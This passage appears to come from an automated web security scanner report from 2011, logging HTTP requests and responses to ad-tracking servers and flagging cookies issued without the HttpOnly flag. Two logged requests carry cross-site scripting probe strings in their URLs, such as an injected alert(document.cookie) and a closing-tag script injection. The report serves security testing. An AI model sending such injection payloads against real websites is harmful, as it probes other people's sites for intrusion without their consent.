ar_p85001580=exp=21&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:19:48 2011&prad=58087454&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296263988%2E989%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 29 Jan 2011 01:32:02 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; expires=Fri 29-Apr-2011 01:32:02 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 27557
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 27 13:24:45 2011&prad=58087454&arc=40401349&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 14:14:48 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; expires=Thu 28-Apr-2011 14:14:48 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296224088; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26257
The following cookie was issued by the application and does not have the HttpOnly flag set:
ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; expires=Thu 28-Apr-2011 22:52:05 GMT; path=/; domain=.voicefive.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bmx3/broker.pli?pid=p83612734&PRAd=57555319&AR_C=39967551 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=10&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 21:57:55 2011&prad=58087444&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296251875%2E953%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 22:52:05 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; expires=Thu 28-Apr-2011 22:52:05 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 24910
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1 Host: au.track.decideinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=8&c2=6135404&rn=534961991&c7=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&c3=15&c4=7477&c10=3182236&c8=Page%20Not%20Found&c9=http%3A%2F%2Fburp%2Fshow%2F4&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Fri, 28 Jan 2011 14:14:32 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 14:14:32 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=6035740&d.c=gif&d.o=desoundings&d.x=31314505&d.t=page&d.u=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x00241B%29%253C%2Fscript%253E HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Fri, 28 Jan 2011 15:00:13 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 15:00:13 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 515 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var B3d=new Date(); var B3m=B3d.getTime(); B3d.setTime(B3m+30*24*60*60*1000); document.cookie="ATTWL=CollectiveB3;expires="+B3d.toGMTString()+";pa ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 317 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:10 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:20:56 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2667 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:00 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3183 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 23:08:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:20:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2667 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:10:10 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3189 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:32:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3198 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:20:56 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2667 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:51:06 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3180 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:06 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3183 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:06:09 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 00:01:57 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3177 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3177 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:00 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2670 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:44:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2834 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/ HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:14:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3318 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:44:24 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2694 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: b3.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 05:21:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_160;RS_SELL_2011Q1_AOL_CPA_160;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/160:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest= Content-Length: 553 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
